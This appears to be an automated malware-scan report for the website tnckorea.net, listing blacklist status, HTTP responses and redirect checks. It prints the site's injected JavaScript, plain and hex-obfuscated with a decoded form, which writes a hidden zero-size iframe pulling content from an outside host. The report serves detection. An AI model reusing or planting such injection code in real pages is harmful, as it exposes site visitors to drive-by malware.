Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tnckorea.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://tnckorea.net/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Mon, 12 Jan 2015 20:54:24 GMT Location: http://tnckorea.net/main Server: Microsoft-IIS/6.0 Content-Length: 145 Content-Type: text/html P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC Set-Cookie: PUID=734CE9D621644D4E911687E2F9B57949; domain=tnckorea.net; path=/ Set-Cookie: ASPSESSIONIDCSDQSSQB=GNHFFJBCECFILGMOKOPHNKII; path=/ X-Powered-By: ASP.NET | clean |
http://tnckorea.net/main | HTTP/1.1 301 Moved Permanently Date: Mon, 12 Jan 2015 20:54:25 GMT Location: http://tnckorea.net/main/ Server: Microsoft-IIS/6.0 Content-Length: 171 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://tnckorea.net/main/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Mon, 12 Jan 2015 20:54:28 GMT Location: /main/main_real.asp Server: Microsoft-IIS/6.0 Content-Length: 140 Content-Type: text/html P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC Set-Cookie: PUID=8CA80E53030D472AB26829FA3DB8053A; domain=tnckorea.net; path=/ Set-Cookie: ASPSESSIONIDCSDQSSQB=KNHFFJBCMOPKOHFAFHMKCFLK; path=/ X-Powered-By: ASP.NET | clean |
http://tnckorea.net/main/main_real.asp | 200 OK Content-Length: 86509 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.cookie.indexOf('long=')==-1){ var expires=new Date(); expires.setTime(expires.getTime () +12*60*60*1000); document.cookie='long=Yes;path=/;expires='+expires.toGMTString(); document.write("<iframe src=http://meehospital.com/swf/index.html width=0 height=0></iframe>");} Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://meehospital.com/swf/index.html <iframe src=http://meehospital.com/swf/index.html width=0 height=0> | ||
http://oxbdigital.com/js/js.js | 200 OK Content-Length: 832 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. var _$=["\x64\x6f\x63\x75\x6d\x65\x6e\x74","\x63\x6f\x6f\x6b\x69\x65","\x69\x6e\x64\x65\x78\x4f\x66",'\x6c\x6f\x6e\x67\x3d',"\x73\x65\x74\x54\x69\x6d\x65","\x67\x65\x74\x54\x69\x6d\x65",'\x6c\x6f\x6e\x67\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67","\x77\x72\x69\x74\x65","\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x65\x65\x68\x6f\x73\x70\x69\x74\x61\x6c\x2e\x63\x6f\x6d\x2f\x73\x77\x66\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(window[_$[0]][_$[1]][_$[2]](_$[3])==-0x1){var a=new Date();a[_$[4]](a[_$[5]]()+0xc*0x3c*0x3c*0x3e8);window[_$[0]][_$[1]]=_$[6]+a[_$[7]]();window[_$[0]][_$[8]](_$[9])} Decoded script: <iframe src=http://meehospital.com/swf/index.html width=0 height=0></iframe> | ||
http://tnckorea.net/jscript/common.js | 200 OK Content-Length: 22768 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/embed.js | 200 OK Content-Length: 2953 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/ajax.js | 200 OK Content-Length: 2358 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/json.js | 200 OK Content-Length: 5095 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/rollover.js | 200 OK Content-Length: 1033 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/user_func.js | 200 OK Content-Length: 2641 Content-Type: application/x-javascript | clean |
http://tnckorea.net/popup_main.js.asp | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://tnckorea.net/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://tnckorea.net/jscript/cookie.js | 200 OK Content-Length: 1022 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/floating.js | 200 OK Content-Length: 3457 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tnckorea.net
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Mon, 12 Jan 2015 20:54:24 GMT
Location: http://tnckorea.net/main
Server: Microsoft-IIS/6.0
Content-Length: 145
Content-Type: text/html
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: PUID=734CE9D621644D4E911687E2F9B57949; domain=tnckorea.net; path=/
Set-Cookie: ASPSESSIONIDCSDQSSQB=GNHFFJBCECFILGMOKOPHNKII; path=/
X-Powered-By: ASP.NET
...145 bytes of data.
GET / HTTP/1.1
Host: tnckorea.net
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Mon, 12 Jan 2015 20:54:24 GMT
Location: http://tnckorea.net/main
Server: Microsoft-IIS/6.0
Content-Length: 145
Content-Type: text/html
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: PUID=734CE9D621644D4E911687E2F9B57949; domain=tnckorea.net; path=/
Set-Cookie: ASPSESSIONIDCSDQSSQB=GNHFFJBCECFILGMOKOPHNKII; path=/
X-Powered-By: ASP.NET
...145 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tnckorea.net
Referer: http://www.google.com/search?q=tnckorea.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tnckorea.net
Referer: http://www.google.com/search?q=tnckorea.net
Result:
The result is similar to the first query. There are no suspicious redirects found.